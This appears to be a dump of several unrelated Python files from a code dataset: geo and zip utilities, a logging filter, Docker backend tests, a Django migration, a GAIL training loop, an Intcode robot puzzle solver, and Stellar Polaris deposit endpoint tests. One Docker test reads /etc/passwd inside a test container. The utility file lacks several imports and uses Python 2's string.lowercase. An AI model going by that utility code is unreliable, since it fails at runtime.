import fnmatch
import numpy as np
from datetime import datetime
__all__ = ['dayends_from_timestamp', 'in_area', 'greate_circle_distance',
'randstr', 'zipdir', 'zippylib', 'normalized']
try:
from matplotlib.patches import FancyArrowPatch, Circle
__all__.append('draw_network')
except:
print("Warnning: install `matplotlib` to use draw_network().")
def dayends_from_timestamp(ts):
""" Determine the range of a valid day now with
(03:00 ~ 03:00 next day)
"""
dt = datetime.fromtimestamp(ts)
if dt.hour < 3:
sds = datetime(dt.year, dt.month, dt.day-1, 3)
else:
sds = datetime(dt.year, dt.month, dt.day, 3)
eds = sds.replace(day=sds.day+1)
return (sds, eds)
def in_area(p, lb, rt):
"""Check if a point (lon, lat) is in an area denoted by
the left-below and right-top points.
"""
if p[0] >= lb[0] and p[0] <= rt[0] and p[1] >= lb[1] and p[1] <= rt[1]:
return True
return False
def greate_circle_distance(lon0, lat0, lon1, lat1):
"""Return the distance (in km) between two points in
geographical coordinates.
"""
EARTH_R = 6372.8
lat0 = np.radians(lat0)
lon0 = np.radians(lon0)
lat1 = np.radians(lat1)
lon1 = np.radians(lon1)
dlon = lon0 - lon1
y = np.sqrt(
(np.cos(lat1) * np.sin(dlon)) ** 2
+ (np.cos(lat0) * np.sin(lat1)
- np.sin(lat0) * np.cos(lat1) * np.cos(dlon)) ** 2)
x = np.sin(lat0) * np.sin(lat1) + \
np.cos(lat0) * np.cos(lat1) * np.cos(dlon)
c = np.arctan2(y, x)
return EARTH_R * c
def radius_of_gyration(coordinates):
""" Calculate the radius of gyration given a list of [(lons, lats)]
"""
clon = np.average([coord[0] for coord in coordinates])
clat = np.average([coord[1] for coord in coordinates])
return np.average([greate_circle_distance(clon, clat, coord[0], coord[1]) for coord in coordinates])
def zipdir(path, zipf=None, fnpat='*'):
"""
Parameters
----------
path:
folder containing plain files to zip
zipf:
path to store zipped file
fnpat:
Unix shell-style wildcards supported by
`fnmatch.py <https://docs.python.org/2/library/fnmatch.html>`_
"""
if zipf is None:
zipf = '/tmp/xoxo-' + randstr(10) + '.zip'
elif zipf[-4:] != '.zip':
zipf = zipf + ".zip"
ziph = zipfile.ZipFile(zipf, 'w')
try:
for root, dirs, files in os.walk(path):
for file in files:
if fnmatch.fnmatch(file, fnpat):
ziph.write(os.path.join(root, file))
return zipf
finally:
ziph.close()
def zippylib(libpath, zipf=None):
""" A particular zip utility for python module.
"""
if zipf is None:
zipf = '/tmp/xoxo-' + randstr(10) + '.zip'
elif zipf[-4:] != '.zip':
zipf = zipf + ".zip"
ziph = zipfile.PyZipFile(zipf, 'w')
try:
ziph.debug = 3
ziph.writepy(libpath)
return zipf
finally:
ziph.close()
def randstr(len):
return ''.join(random.choice(string.lowercase) for i in range(len))
def normalized(a, axis=None, order=2):
l2 = np.atleast_1d(np.linalg.norm(a, order, axis))
l2[l2==0] = 1
return a / l2
| StarcoderdataPython |
1715807 | import collections
import logging
import pprint
class PprintArgsFilter(logging.Filter):
'''Use pprint/pformat to pretty the log message args
ie, log.debug("foo: %s", foo)
this will pformat the value of the foo object.
'''
def __init__(self, name="", defaults=None):
super(PprintArgsFilter, self).__init__(name=name)
self.defaults = defaults or {}
def filter(self, record):
if not record.args:
return True
# Modify the log record in place, replacing the arg
# with a pprint'ed version of it's values.
# TODO: could wrap with a callable to defer evaluating
# the arg till the last minute
# print("record.args1: %s" % list(record.args))
# args can be a tuple or a dict/map, this bit is from logging.LogRecord.__init__
args_map = {}
if isinstance(record.args, collections.abc.Mapping):
args_map = record.args
if args_map:
for arg, value in args_map.items():
args_map[arg] = pprint.pformat(value)
record.args = args_map
else:
record.args = tuple([pprint.pformat(x) for x in record.args])
# record.args = tuple(pprint.pformat(x) for x in record.args)
# print("record.args2: %s" % list(record.args))
# for arg in record.args:
# print("arg: %s", arg)
# pretty_arg = pprint.pformat(record.args[arg])
# record.args[arg] = pretty_arg
return True
| StarcoderdataPython |
3576727 | <reponame>francois-vincent/simply
# encoding: utf-8
import os.path
from simply import ROOTDIR
from simply.backends import docker, get_class
from simply.utils import ConfAttrDict
def test_version():
version = docker.docker_version()
assert len(version.split('.')) == 3
def test_build():
docker.image_delete_and_containers('scratch')
try:
assert docker.docker_build('scratch')
assert docker.get_images('scratch') == ['scratch']
finally:
docker.image_delete('scratch')
def test_build_inline():
inline = """
FROM scratch
CMD ["/bin/cat"]
"""
docker.image_delete_and_containers('scratch')
try:
assert docker.docker_build(inline, tag='scratch')
assert docker.get_images('scratch') == ['scratch']
finally:
docker.image_delete('scratch')
def test_container_delete():
docker.container_delete(image='busybox')
try:
# performs a test of docker_run by the way, so I removed test_run()
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
assert len(docker.get_containers(image='busybox')) == 1
# delete by image name
assert docker.container_delete(image='busybox')
assert len(docker.get_containers(image='busybox')) == 0
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
# delete by container name
containers = docker.get_containers(image='busybox')
assert docker.container_delete(*containers)
assert len(docker.get_containers(image='busybox')) == 0
finally:
docker.container_delete(image='busybox')
def test_exec():
docker.container_delete(image='busybox')
try:
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
res = docker.docker_exec('ls', 'busybox').split('\n')
assert len(res) > 9
assert 'bin' in res
assert 'etc' in res
finally:
docker.container_delete(image='busybox')
def test_get_data():
docker.container_delete(image='busybox')
try:
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
res = docker.get_data('/etc/passwd', 'busybox').split('\n')
assert 'root:x:0:0:root:/root:/bin/sh' in res
finally:
docker.container_delete(image='busybox')
def test_put_file():
docker.container_delete(image='busybox')
try:
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
file = os.path.join(ROOTDIR, '__init__.py')
assert docker.put_file(file, '/', 'busybox')
with open(file, 'r') as f:
content = f.read()
assert content == docker.get_data('/__init__.py', 'busybox')
finally:
docker.container_delete(image='busybox')
def test_path_exists():
docker.container_delete(image='busybox')
try:
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
assert docker.path_exists('/root', 'busybox')
assert not docker.path_exists('/toto', 'busybox')
finally:
docker.container_delete(image='busybox')
def test_put_data():
docker.container_delete(image='busybox')
try:
assert docker.docker_run('busybox', 'busybox', cmd='/bin/cat')
file = os.path.join(ROOTDIR, '__init__.py')
with open(file, 'r') as f:
content = f.read()
assert docker.put_data(content, '/__init__.py', 'busybox')
assert content == docker.get_data('/__init__.py', 'busybox')
finally:
docker.container_delete(image='busybox')
# Test DockerBackend
def test_docker_import():
conf = ConfAttrDict(
backend='docker'
)
assert get_class(conf) is docker.this_class
def test_docker_conf():
conf = ConfAttrDict()
db = docker.this_class()
db.image = 'busybox'
assert db.init_backend(conf)
assert db.parameters is None
assert db.container.startswith(db.image)
conf = ConfAttrDict(
container='busybox',
parameters='-v /bin:/bin'
)
db = docker.this_class()
db.image = 'busybox'
assert db.init_backend(conf)
assert db.container == conf.container
assert db.parameters == conf.parameters
def test_docker_pull():
conf = ConfAttrDict(
image_spec='.pull'
)
db = docker.this_class()
db.image = 'busybox'
assert db.init_backend(conf)
assert db.build_image('uproot')
assert db.image_exist()
def test_docker_build():
conf = ConfAttrDict()
db = docker.this_class()
db.image = 'scratch'
assert db.init_backend(conf)
assert db.build_image('uproot')
def test_docker_build_path():
conf = ConfAttrDict(
image_spec=os.path.join(ROOTDIR, 'images')
)
db = docker.this_class()
db.image = 'scratch'
assert db.init_backend(conf)
assert db.build_image('uproot')
assert db.image_exist()
def test_docker_build_inline():
conf = ConfAttrDict(
image_spec="""
FROM scratch
CMD ["/bin/cat"]
"""
)
db = docker.this_class()
db.image = 'scratch'
assert db.init_backend(conf)
assert db.build_image('uproot')
assert db.image_exist()
| StarcoderdataPython |
6411243 | # Generated by Django 2.0.10 on 2019-01-31 13:28
import articles.models
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('articles', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='user',
field=models.ForeignKey(on_delete=models.SET(articles.models.get_sentinel_user), to=settings.AUTH_USER_MODEL, verbose_name='文章作者'),
),
]
| StarcoderdataPython |
4957032 | # Library Imports
import os
import gym
import numpy as np
from GAIL import Agent
abs_path = os.getcwd()
# Load the Environment
env = gym.make('CartPole-v1')
# Load the Expert Dataset and Agent
expert_obs = np.load(
abs_path+'/Expert/data/expert_DatasetStates.npy', allow_pickle=False)
expert_actions = np.load(
abs_path+'/Expert/data/expert_DatasetAction.npy', allow_pickle=False)
agent = Agent(expert_obs, expert_actions, env, batch_size=64)
agent.memorize_expert()
n_games = 2500
score_history = []
avg_history = []
best_score = env.reward_range[0]
avg_score = 0
for i in range(n_games):
score = 0
done = False
# Initial Reset of Environment
observation = env.reset()
while not done:
action = agent.choose_action(observation)
observation_, reward, done, info = env.step(np.argmax(action))
observation = observation_
score += reward
# Optimize the Agent
agent.optimize(16)
score_history.append(score)
avg_score = np.mean(score_history[-100:])
avg_history.append(avg_score)
if avg_score > best_score:
best_score = avg_score
agent.save_model()
print(
f'Episode:{i} \t ACC. Rewards: {score} \t AVG. Rewards: {avg_score:3.2f} \t *** MODEL SAVED! ***')
else:
print(
f'Episode:{i} \t ACC. Rewards: {score} \t AVG. Rewards: {avg_score:3.2f}')
# Save the Training data and Model Loss
np.save(abs_path+'/GAIL/data/score_history',
score_history, allow_pickle=False)
np.save(abs_path+'/GAIL/data/avg_history', avg_history, allow_pickle=False)
| StarcoderdataPython |
8132090 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import copy
import operator
import pathlib
import uuid
import numpy as np
import PIL.Image
HERE = pathlib.Path(__file__).resolve().parent
OPCODES = {
1: ("ADD", 3),
2: ("MULTIPLY", 3),
3: ("INPUT", 1),
4: ("OUTPUT", 1),
5: ("JUMP-IF-TRUE", 2),
6: ("JUMP-IF-FALSE", 2),
7: ("LESS-THAN", 3),
8: ("EQUALS", 3),
9: ("ADJUST_BASE", 1),
99: ("HALT", 0),
}
POSITION_MODE = "0"
IMMEDIATE_MODE = "1"
RELATIVE_MODE = "2"
ALL_MODES = set("012")
NO_JUMP_JUMP_INDEX = uuid.uuid4()
TERMINAL_JUMP_INDEX = uuid.uuid4()
COLOR_BLACK = 0
COLOR_WHITE = 1
MAX_PIXEL = 255
TURN_LEFT = np.array([[0, -1], [1, 0]])
TURN_RIGHT = np.array([[0, 1], [-1, 0]])
class AdjustBase:
def __init__(self, value):
self.value = value
def less_than_binary_op(value1, value2):
if value1 < value2:
to_store = 1
else:
to_store = 0
return to_store
def equal_binary_op(value1, value2):
if value1 == value2:
to_store = 1
else:
to_store = 0
return to_store
def get_value(mode, param, relative_base, program):
if mode == POSITION_MODE:
index = param
assert 0 <= index
return program[index]
if mode == IMMEDIATE_MODE:
return param
if mode == RELATIVE_MODE:
index = relative_base + param
assert 0 <= index
return program[index]
raise ValueError("Invalid mode", mode)
def set_value(mode, param, to_store, relative_base, program):
if mode == POSITION_MODE:
index = param
assert 0 <= index
program[index] = to_store
return
if mode == RELATIVE_MODE:
index = relative_base + param
assert 0 <= index
program[index] = to_store
return
raise ValueError("Invalid mode", mode)
def _do_binary_op(modes, params, relative_base, program, fn):
mode1, mode2, mode3 = modes
param1, param2, param3 = params
value1 = get_value(mode1, param1, relative_base, program)
value2 = get_value(mode2, param2, relative_base, program)
to_store = fn(value1, value2)
set_value(mode3, param3, to_store, relative_base, program)
return NO_JUMP_JUMP_INDEX
def do_add(modes, params, relative_base, program):
return _do_binary_op(modes, params, relative_base, program, operator.add)
def do_multiply(modes, params, relative_base, program):
return _do_binary_op(modes, params, relative_base, program, operator.mul)
def do_input(modes, params, relative_base, program, std_input):
mode, = modes
param, = params
to_store = next(std_input)
set_value(mode, param, to_store, relative_base, program)
return NO_JUMP_JUMP_INDEX
def do_output(modes, params, relative_base, program, std_output):
mode, = modes
param, = params
value = get_value(mode, param, relative_base, program)
std_output.append(value)
return NO_JUMP_JUMP_INDEX
def _do_jump_unary_predicate(modes, params, relative_base, program, fn):
mode1, mode2 = modes
param1, param2 = params
value1 = get_value(mode1, param1, relative_base, program)
value2 = get_value(mode2, param2, relative_base, program)
if fn(value1):
return value2
return NO_JUMP_JUMP_INDEX
def do_jump_if_true(modes, params, relative_base, program):
return _do_jump_unary_predicate(
modes, params, relative_base, program, operator.truth
)
def do_jump_if_false(modes, params, relative_base, program):
return _do_jump_unary_predicate(
modes, params, relative_base, program, operator.not_
)
def do_less_than(modes, params, relative_base, program):
return _do_binary_op(
modes, params, relative_base, program, less_than_binary_op
)
def do_equal(modes, params, relative_base, program):
return _do_binary_op(
modes, params, relative_base, program, equal_binary_op
)
def do_adjust_base(modes, params, relative_base, program):
mode, = modes
param, = params
value = get_value(mode, param, relative_base, program)
return AdjustBase(value)
def do_halt():
return TERMINAL_JUMP_INDEX
def next_instruction(index, program):
assert 0 <= index
op_code_with_extra = program[index]
assert op_code_with_extra >= 0
mode_as_int, op_code = divmod(op_code_with_extra, 100)
instruction, num_params = OPCODES[op_code]
next_index = index + 1 + num_params
if num_params == 0:
assert mode_as_int == 0
return instruction, (), (), next_index
mode_chars = str(mode_as_int).zfill(num_params)
assert len(mode_chars) == num_params, (mode_chars, num_params)
assert set(mode_chars) <= ALL_MODES
modes = tuple(reversed(mode_chars))
params = tuple(program[i] for i in range(index + 1, next_index))
assert len(params) == num_params # No partial slice
return instruction, modes, params, next_index
def execute_instruction(
instruction, modes, params, relative_base, program, std_input, std_output
):
if instruction == "ADD":
return do_add(modes, params, relative_base, program)
if instruction == "MULTIPLY":
return do_multiply(modes, params, relative_base, program)
if instruction == "INPUT":
return do_input(modes, params, relative_base, program, std_input)
if instruction == "OUTPUT":
return do_output(modes, params, relative_base, program, std_output)
if instruction == "JUMP-IF-TRUE":
return do_jump_if_true(modes, params, relative_base, program)
if instruction == "JUMP-IF-FALSE":
return do_jump_if_false(modes, params, relative_base, program)
if instruction == "LESS-THAN":
return do_less_than(modes, params, relative_base, program)
if instruction == "EQUALS":
return do_equal(modes, params, relative_base, program)
if instruction == "ADJUST_BASE":
return do_adjust_base(modes, params, relative_base, program)
if instruction == "HALT":
return do_halt()
raise ValueError("Bad instruction", instruction, modes, params, program)
def run_intcode(program, std_input, std_output):
relative_base = 0
running_program = copy.deepcopy(program)
jump_index = NO_JUMP_JUMP_INDEX
index = 0
while jump_index != TERMINAL_JUMP_INDEX:
instruction, modes, params, index = next_instruction(
index, running_program
)
jump_index = execute_instruction(
instruction,
modes,
params,
relative_base,
running_program,
std_input,
std_output,
)
if isinstance(jump_index, AdjustBase):
relative_base += jump_index.value
elif jump_index in (NO_JUMP_JUMP_INDEX, TERMINAL_JUMP_INDEX):
# Nothing to do here, all good.
pass
elif jump_index >= 0:
index = jump_index
else:
raise ValueError("Invalid jump index", jump_index)
return running_program
class Robot:
def __init__(self, start_color):
assert start_color in (COLOR_BLACK, COLOR_WHITE)
self.input_index = 0
self.std_input = [start_color] # Seed first panel
self.std_output = []
self.panels = collections.defaultdict(list)
self.position = np.array([[0], [0]])
self.direction = np.array([[0], [1]])
def __iter__(self):
return self
def __next__(self):
# NOTE: This is not thread-safe
curr_index = self.input_index
self.input_index = curr_index + 1
return self.std_input[curr_index]
def append(self, value):
# NOTE: This is not thread-safe
self.std_output.append(value)
if len(self.std_output) % 2 == 0:
color, direction_int = self.std_output[-2:]
assert color in (COLOR_BLACK, COLOR_WHITE)
# Paint the current panel.
self.panels[tuple(self.position.flatten())].append(color)
# Turn the robot
if direction_int == 0:
self.direction = TURN_LEFT.dot(self.direction)
elif direction_int == 1:
self.direction = TURN_RIGHT.dot(self.direction)
else:
raise ValueError("Invalid direction", direction_int)
# Advance the robot
self.position += self.direction
# Get current paint color of new position
colors = self.panels[tuple(self.position.flatten())]
if colors:
curr_color = colors[-1]
else:
curr_color = COLOR_BLACK
# Add the color to inputs.
self.std_input.append(curr_color)
def paint_hull(program, start_color):
robot = Robot(start_color)
run_intcode(program, robot, robot)
return robot
def main():
filename = HERE / "input.txt"
with open(filename, "r") as file_obj:
content = file_obj.read()
program = collections.defaultdict(int)
for index, value in enumerate(content.strip().split(",")):
program[index] = int(value)
robot = paint_hull(program, COLOR_BLACK)
count = sum(1 for colors in robot.panels.values() if colors)
print(f"Number of painted panels when starting with Black: {count}")
robot = paint_hull(program, COLOR_WHITE)
all_indices = np.array(list(robot.panels.keys()))
min_x = min(all_indices[:, 0])
max_x = max(all_indices[:, 0])
min_y = min(all_indices[:, 1])
max_y = max(all_indices[:, 1])
width_x = max_x - min_x + 1
width_y = max_y - min_y + 1
painted = COLOR_BLACK * np.ones((width_x, width_y), dtype=np.uint8)
for position, colors in robot.panels.items():
if not colors:
continue
assert len(colors) == 1
color = colors[0]
assert color in (COLOR_BLACK, COLOR_WHITE)
x, y = position
shifted_x = x - min_x
shifted_y = y - min_y
assert 0 <= shifted_x < width_x
assert 0 <= shifted_y < width_y
painted[shifted_x, shifted_y] = color
# Swap rows and columns
painted = painted.T
# Invert rows
painted = painted[::-1, :]
# Swap white and black and scale up to highest pixel intensity.
image = PIL.Image.fromarray(MAX_PIXEL - MAX_PIXEL * painted)
image.save(HERE / "image.png")
if __name__ == "__main__":
main()
| StarcoderdataPython |
3294671 | <reponame>stfung77/django-polaris
"""
This module tests the `/deposit` endpoint.
Celery tasks are called synchronously. Horizon calls are mocked for speed and correctness.
"""
import json
from unittest.mock import patch
import jwt
import time
import pytest
from stellar_sdk import Keypair, MuxedAccount
from polaris import settings
from polaris.models import Transaction, Asset
from polaris.integrations import TransactionForm
from polaris.tests.helpers import (
mock_check_auth_success,
mock_check_auth_success_client_domain,
mock_check_auth_success_muxed_account,
mock_check_auth_success_with_memo,
interactive_jwt_payload,
TEST_MUXED_ACCOUNT,
TEST_ACCOUNT_MEMO,
)
WEBAPP_PATH = "/sep24/transactions/deposit/webapp"
DEPOSIT_PATH = "/sep24/transactions/deposit/interactive"
HORIZON_SUCCESS_RESPONSE = {
"successful": True,
"id": "test_stellar_id",
"paging_token": "123456789",
"envelope_xdr": "", # doesn't need to be populated, for now
}
HORIZON_SUCCESS_RESPONSE_CLAIM = {
"successful": True,
"id": "test_stellar_id",
"paging_token": "123456789",
"result_xdr": "AAAAAAAAAGQAAAAAAAAAAQAAAAAAAAAOAAAAAAAAAAAyBzvi/vP0Bih6bAqRNkiutMVUkW1S+WtuITJAA<KEY>A=",
"envelope_xdr": "", # doesn't need to be populated for now
}
# Test client account and seed
client_address = "GDKFNRUATPH4BSZGVFDRBIGZ5QAFILVFRIRYNSQ4UO7V2ZQAPRNL73RI"
client_seed = "<KEY>"
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_success(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` succeeds with no optional arguments."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{"asset_code": "USD", "account": deposit.stellar_account, "amount": 100},
)
content = json.loads(response.content)
t = Transaction.objects.first()
assert content["type"] == "interactive_customer_info_needed"
assert "100" in content["url"]
assert t.amount_in is None
assert t.amount_out is None
assert t.amount_fee is None
assert t.kind == Transaction.KIND.deposit
assert t.protocol == Transaction.PROTOCOL.sep24
assert t.status == Transaction.STATUS.incomplete
assert t.stellar_account == "test source address"
assert t.asset == deposit.asset
assert t.started_at
assert t.completed_at is None
assert t.from_address is None
assert t.to_address == deposit.stellar_account
assert t.memo is None
assert t.claimable_balance_supported is False
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success_muxed_account)
def test_deposit_success_muxed_account(client):
asset = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
response = client.post(
DEPOSIT_PATH,
{"asset_code": "USD", "account": TEST_MUXED_ACCOUNT, "amount": 100},
)
content = json.loads(response.content)
t = Transaction.objects.first()
assert content["type"] == "interactive_customer_info_needed"
assert "100" in content["url"]
assert t.amount_in is None
assert t.amount_out is None
assert t.amount_fee is None
assert t.kind == Transaction.KIND.deposit
assert t.protocol == Transaction.PROTOCOL.sep24
assert t.status == Transaction.STATUS.incomplete
assert t.stellar_account == MuxedAccount.from_account(TEST_MUXED_ACCOUNT).account_id
assert t.muxed_account == TEST_MUXED_ACCOUNT
assert t.account_memo is None
assert t.asset == asset
assert t.started_at
assert t.completed_at is None
assert t.from_address is None
assert t.to_address == TEST_MUXED_ACCOUNT
assert t.memo is None
assert t.claimable_balance_supported is False
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success_with_memo)
def test_deposit_success_with_auth_memo(client):
asset = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
to_address = Keypair.random().public_key
response = client.post(
DEPOSIT_PATH,
{"asset_code": "USD", "account": to_address, "amount": 100},
)
content = json.loads(response.content)
t = Transaction.objects.first()
assert content["type"] == "interactive_customer_info_needed"
assert "100" in content["url"]
assert t.amount_in is None
assert t.amount_out is None
assert t.amount_fee is None
assert t.kind == Transaction.KIND.deposit
assert t.protocol == Transaction.PROTOCOL.sep24
assert t.status == Transaction.STATUS.incomplete
assert t.stellar_account == "test source address"
assert t.muxed_account is None
assert t.account_memo is TEST_ACCOUNT_MEMO
assert t.asset == asset
assert t.started_at
assert t.completed_at is None
assert t.from_address is None
assert t.to_address == to_address
assert t.memo is None
assert t.claimable_balance_supported is False
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_no_params(client):
"""`POST /transactions/deposit/interactive` fails with no required parameters."""
# Because this test does not use the database, the changed setting
# earlier in the file is not persisted when the tests not requiring
# a database are run. Thus, we set that flag again here.
response = client.post(DEPOSIT_PATH, {}, follow=True)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "`asset_code` and `account` are required parameters"}
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_no_account(client):
"""`POST /transactions/deposit/interactive` fails with no `account` parameter."""
response = client.post(DEPOSIT_PATH, {"asset_code": "NADA"}, follow=True)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "`asset_code` and `account` are required parameters"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_no_asset(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` fails with no `asset_code` parameter."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH, {"account": deposit.stellar_account}, follow=True
)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "`asset_code` and `account` are required parameters"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_invalid_account(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` fails with an invalid `account` parameter."""
acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{
"asset_code": "USD",
"account": "<KEY>",
},
follow=True,
)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "invalid 'account'"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_invalid_asset(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` fails with an invalid `asset_code` parameter."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{"asset_code": "GBP", "account": deposit.stellar_account},
follow=True,
)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "unknown asset: GBP"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_invalid_amount(client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
distribution_seed=Keypair.random().secret,
deposit_max_amount=1000,
)
response = client.post(
DEPOSIT_PATH,
{
"asset_code": usd.code,
"account": Keypair.random().public_key,
"amount": 10000,
},
follow=True,
)
assert response.status_code == 400
assert response.json()["error"] == "invalid 'amount'"
@pytest.mark.django_db
def test_deposit_no_jwt(client, acc1_usd_deposit_transaction_factory):
"""`GET /deposit` fails if a required JWT isn't provided."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{
"asset_code": "USD",
"account": deposit.stellar_account,
"memo_type": "text",
"memo": "foo",
},
follow=True,
)
content = json.loads(response.content)
assert response.status_code == 403
assert content == {"error": "JWT must be passed as 'Authorization' header"}
@pytest.mark.django_db
def test_interactive_deposit_no_token(client):
"""
`GET /deposit/webapp` fails without token argument
The endpoint returns HTML so we cannot extract the error message from the
response.
"""
response = client.get(WEBAPP_PATH)
assert "Missing authentication token" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_bad_issuer(client, acc1_usd_deposit_transaction_factory):
deposit = acc1_usd_deposit_transaction_factory()
payload = interactive_jwt_payload(deposit, "deposit")
payload["iss"] = "bad iss"
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(f"{WEBAPP_PATH}?token={token}")
assert "Invalid token issuer" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_past_exp(client, acc1_usd_deposit_transaction_factory):
deposit = acc1_usd_deposit_transaction_factory()
payload = interactive_jwt_payload(deposit, "deposit")
payload["exp"] = time.time()
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(f"{WEBAPP_PATH}?token={token}")
assert "Token is not yet valid or is expired" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_no_transaction(
client, acc1_usd_deposit_transaction_factory
):
deposit = acc1_usd_deposit_transaction_factory()
payload = interactive_jwt_payload(deposit, "deposit")
deposit.delete() # remove from database
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(f"{WEBAPP_PATH}?token={token}")
assert "Transaction for account not found" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_success(client, acc1_usd_deposit_transaction_factory):
deposit = acc1_usd_deposit_transaction_factory()
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 403
assert "Unexpected one-time auth token" in str(response.content)
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 200.0},
)
assert response.status_code == 302
assert client.session["authenticated"] is False
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_user_transfer_start
assert deposit.amount_in == 200
assert deposit.amount_expected == 200
assert deposit.amount_fee == 7
assert deposit.amount_out == 193
@pytest.mark.django_db
@patch("polaris.sep24.deposit.settings.ADDITIVE_FEES_ENABLED", True)
def test_interactive_deposit_success_additive_fees(
client, acc1_usd_deposit_transaction_factory
):
deposit = acc1_usd_deposit_transaction_factory()
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 403
assert "Unexpected one-time auth token" in str(response.content)
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 200.0},
)
assert response.status_code == 302
assert client.session["authenticated"] is False
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_user_transfer_start
assert deposit.amount_in == 207
assert deposit.amount_expected == 207
assert deposit.amount_fee == 7
assert deposit.amount_out == 200
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.after_form_validation")
def test_interactive_deposit_pending_anchor(
mock_after_form_validation, client, acc1_usd_deposit_transaction_factory
):
deposit = acc1_usd_deposit_transaction_factory()
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 403
assert "Unexpected one-time auth token" in str(response.content)
def mark_as_pending_anchor(transaction, **_kwargs):
transaction.status = Transaction.STATUS.pending_anchor
transaction.save()
mock_after_form_validation.side_effect = mark_as_pending_anchor
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 200.0},
